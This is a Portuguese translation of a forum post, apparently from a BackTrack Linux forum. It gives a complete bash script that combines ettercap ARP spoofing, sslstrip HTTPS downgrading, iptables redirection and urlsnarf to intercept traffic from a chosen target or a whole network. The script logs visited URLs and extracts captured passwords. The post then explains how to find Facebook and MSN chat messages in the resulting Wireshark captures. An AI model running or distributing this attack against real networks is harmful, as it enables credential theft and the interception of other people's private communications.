UPDATED SCRIPT 27 / 4 - acrescentado tcpxtract
UPDATE: Como encontrar facebook mensagens de chat ...

Fiquei muito cansado de escrever comandos infinitamente, enquanto fazia pentesting minha rede. Então eu comecei a escrever um script para qualquer coisa que eu faço. Este script é o que eu mais uso sobretudo.

Eu ainda sou muito novo em Backtrack/Linux, mas esse script realmente funciona para mim e estou certo que outros novatos lá fora, pode colocá-lo em bom uso também.

Antes de mais nada, verifique se o etter.conf é padrão. Seu etter.conf está localizado em /etc/etter.conf - esta seção devem permanecer comentada:

Code:
# if you use iptables:
   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Isto está assim porque meu ettercap uso para fazer o arpspoofing, mas eu não quero que ele faça a coisa com certificado falso (temos sslstrip para fazer o
trabalho).

Salve esse código para um novo arquivo de texto e salvar como anything.sh
(certifique-se de executar chmod, direito clique com botão direito do mouse->properties->permissions->check "is executable)

Code:
#!/bin/bash
echo -n "Do you want to execute Wireshark when done? If yes, LEAVE BLANK "
read -e NOYES
echo -n "Do you want to extract pictures from the pcap via tcpxtract? If yes, LEAVE BLANK "
read -e XTRACT
echo -n "What interface to use? ie wlan0: "
read -e IFACE
echo -n "Name of "Session"? (name of the folder that will be created with all the log files): "
read -e SESSION
echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e ROUTER
echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e VICTIM
mkdir /root/$SESSION/
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
sslstrip -p -k -w /root/$SESSION/$SESSION.log &
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &
ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/
"$XTRACT"tcpxtract -f /root/$SESSION/$SESSION.pcap
"$NOYES"wireshark &
killall sslstrip
killall python
killall urlsnarf
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain


etterlog -p -i /root/$SESSION/$SESSION.eci
A sua frente bonita ...

Este script será executado no sslstrip+arquivo de log, urlsnarf (fazendo dumping de todas as urls em um arquivo txt), com arpspoofing pelo ettercap
e arquivos de log (com as senhas) em um arquivo pcap (para aprofundar a análise). Todos os arquivos são colocados na mesma pasta, com nomes idênticos (claro que com extensões diferentes).
Além disso, ao sair do script (e do ettercap) devidamente com a tecla "q", o script irá limpar arquivos utilizados (desligando o urlsnarf, sslstrip e flushing o iptables).

Finalmente ele automaticamente lê senhas a partir do arquivo de log do ettercap (.IPI) e é executa o wireshark para aprofundar a análise.

DICA:
Para mim, a maneira mais fácil para o dump das imagens de um arquivo pcap (que gera o script), é usando NetworkMiner for windows. Ao executar através do WINE, se você fuçar um pouco como este tutorial mostra:
hxxp://geek00l.blogspot.com/2008/12/drunken-monkey-running-network-miner.html

COMO ENCONTRAR FACEBOOK MSN/CHAT EM WIRESHARK:
Encontrar msn é fácil. Há muitas expressões no wireshark, tem o nome de "MSNMS". Se você aplicar isso, vou mostrar-lhe as mensagens.

Encontrar facebook bate-papo é um pouco mais complicado. Não há nenhuma expressão ou de filtro a ser usado. Mas descobri:
CTRL+F traz para você o comando de buscar pacotes. Procure: /AJAX/chat/send.php

ATENÇÃO: na caixa de pesquisa, marque a caixa que as buscas por "string" e no search em: Packet List.

Isso lhe dará os pacotes com as mensagens enviadas. Quando você seleciona o pacote, vá até o Scroll Down e expanda em "Line-based text data:"

Lá você terá a mensagem, se você olhar com cuidado.

Não é muito "elegante" ... mas...rss

Eu não testei isso para obtenção de uma mensagem de volta. Mas isso deve ser bastante fácil. Você pode sempre começar o sniffer, então enviando uma mensagem ou recebendo uma mensagem e depois parar sniffing. Em seguida, abra o pcap no wireshark e olhar para os pacotes. Identifique a mensagem recebida e encontre uma forma de procurar por pacotes semelhantes no futuro.

Sinta-se livre para fazer qualquer pergunta.

Teddy Strand

Fonte:http://www.backtrack-linux.org/forum...rlsnarf-3.html
Tradução e Adaptação: @firebitsbr